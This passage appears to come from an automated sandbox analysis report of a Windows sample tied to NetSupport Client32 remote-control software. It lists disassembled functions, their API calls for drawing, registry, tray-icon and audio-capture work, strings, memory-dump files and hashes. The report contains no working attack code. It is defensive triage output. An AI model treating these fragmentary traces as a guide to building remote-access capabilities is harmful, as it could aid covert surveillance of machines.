                                                                                      • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                      • DeleteObject.GDI32(?), ref: 11005528
                                                                                      • DeleteDC.GDI32(?), ref: 1100552E
                                                                                      • DeleteObject.GDI32(?), ref: 1100553F
                                                                                      • DeleteObject.GDI32(?), ref: 1100556A
                                                                                      • DeleteObject.GDI32(?), ref: 11005588
                                                                                      • DeleteObject.GDI32(?), ref: 11005591
                                                                                      • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                      • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                      • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                      • API String ID: 2789700732-770455996
                                                                                      • Opcode ID: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                      • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                      • Opcode Fuzzy Hash: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                      • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                      Function 11015290 Relevance: 43.7, APIs: 29, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • BeginPaint.USER32(?,?), ref: 110152BF
                                                                                      • GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                      • _memset.LIBCMT ref: 110152E5
                                                                                      • CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                      • BeginPath.GDI32(00000000), ref: 1101532D
                                                                                      • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                      • EndPath.GDI32(00000000), ref: 11015357
                                                                                      • PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                      • CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                      • CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                      • CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                      • SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                      • GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                      • OffsetRgn.GDI32(00000000,?,00000000), ref: 110153EA
                                                                                      • FillRgn.GDI32(00000000,00000000,?), ref: 110153F9
                                                                                      • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101540C
                                                                                      • DeleteObject.GDI32(00000000), ref: 11015419
                                                                                      • SelectObject.GDI32(00000000,?), ref: 11015423
                                                                                      • SelectObject.GDI32(00000000,?), ref: 1101542D
                                                                                      • DeleteObject.GDI32(?), ref: 11015436
                                                                                      • DeleteObject.GDI32(?), ref: 1101543F
                                                                                      • DeleteObject.GDI32(?), ref: 11015448
                                                                                      • SelectObject.GDI32(00000000,?), ref: 11015452
                                                                                      • DeleteObject.GDI32(?), ref: 1101545B
                                                                                      • SetBkMode.GDI32(00000000,?), ref: 11015465
                                                                                      • EndPaint.USER32(?,?), ref: 11015479
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3702029449-0
                                                                                      • Opcode ID: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                      • Instruction ID: 652d7b9cefe541cc9f67407d7bb7a055c5a4b94d45e30f14e3a138b487ffb704
                                                                                      • Opcode Fuzzy Hash: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                      • Instruction Fuzzy Hash: 0D511875A10228AFDB14DBA4CC88FAEF7B9EF89304F004199E519D7244DB74AE44CF61
                                                                                      Function 110FF3C0 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 207synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75BF8400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                      • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                      • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                      • wsprintfA.USER32 ref: 110FF5BE
                                                                                      • _memset.LIBCMT ref: 110FF5CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                      • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                      • API String ID: 137837830-2801557662
                                                                                      • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                      • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                      • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                      • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                      Function 111352B0 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 260windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _memset.LIBCMT ref: 11135335
                                                                                      • LoadIconA.USER32(00000000,00000455), ref: 11135403
                                                                                      • _strncpy.LIBCMT ref: 11135425
                                                                                      • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,4012B9B4,00000000,1102E392,00000001), ref: 11135436
                                                                                      • LoadIconA.USER32(00000000,0000045C), ref: 11135456
                                                                                      • GetWindowTextA.USER32(0002046E,?,00000180), ref: 11135478
                                                                                      • wsprintfA.USER32 ref: 111354F4
                                                                                        • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                      • wsprintfA.USER32 ref: 1113552C
                                                                                      • wsprintfA.USER32 ref: 1113558D
                                                                                      • wsprintfA.USER32 ref: 111355E8
                                                                                      • Shell_NotifyIconA.SHELL32(1102D57D,000001E8,00000001,00000000,4012B9B4,00000000,1102E392,00000001), ref: 11135623
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                                      • String ID: %s$%s%s$405464$Client$SysTray$
                                                                                      • API String ID: 1881589080-1089849070
                                                                                      • Opcode ID: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                      • Instruction ID: 2c8920b03c090074b43ba546e334978a2e83067bba728106ef80608c6d9e13b6
                                                                                      • Opcode Fuzzy Hash: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                      • Instruction Fuzzy Hash: EAA15CB1D042159FDB62CF74CC50BAEF7B9BB44719F4045ACE829A7284EB71AA44CF50
                                                                                      Function 110EB120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • wsprintfA.USER32 ref: 110EB1B8
                                                                                      • GetTickCount.KERNEL32 ref: 110EB212
                                                                                      • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                      • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                      • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                      • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                      • API String ID: 3451743168-2289091950
                                                                                      • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                      • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                      Function 11131250 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                      • API String ID: 2111968516-1286714176
                                                                                      • Opcode ID: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                      • Instruction ID: cfced163e91c544f1d9a441fe05b752d20d9a2d0abefb67461bd630bfcd17819
                                                                                      • Opcode Fuzzy Hash: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                      • Instruction Fuzzy Hash: 0C911975A50319AFEB11DFA4CD84FDAF3B4BF88725F1041A8E519A7284EB30AA40CF51
                                                                                      Function 1100B310 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _malloc.LIBCMT ref: 1100B366
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,4012B9B4,?,00000000,00000000), ref: 1100AC84
                                                                                        • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                        • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                        • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                        • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                        • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                        • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                        • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                      • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,4012B9B4,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                      • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                      • _calloc.LIBCMT ref: 1100B3E9
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                      Strings
                                                                                      • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                      • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                      • DisableSounds, xrefs: 1100B342
                                                                                      • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                      • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                      • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                      • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                      • Audio, xrefs: 1100B347
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                      • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                      • API String ID: 1843377891-2362500394
                                                                                      • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                      • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                      • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                      • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                      Function 11125200 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 240comwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 1112523A
                                                                                      • SendMessageA.USER32(?,0000043C,00000000,?), ref: 11125251
                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 11125280
                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 111252B6
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • OleCreateStaticFromData.OLE32(00000000,111C093C,00000002,?,?,?,?), ref: 111253C2
                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 111253D8
                                                                                      • _memset.LIBCMT ref: 111253E5
                                                                                      • CoUninitialize.OLE32 ref: 11125499
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                      • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                      • API String ID: 1820880743-4036218486
                                                                                      • Opcode ID: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                      • Instruction ID: 08d7bdd5ab5c60396c417d70c353951ed5684100983e189a7c8dd5e42ede2f0c
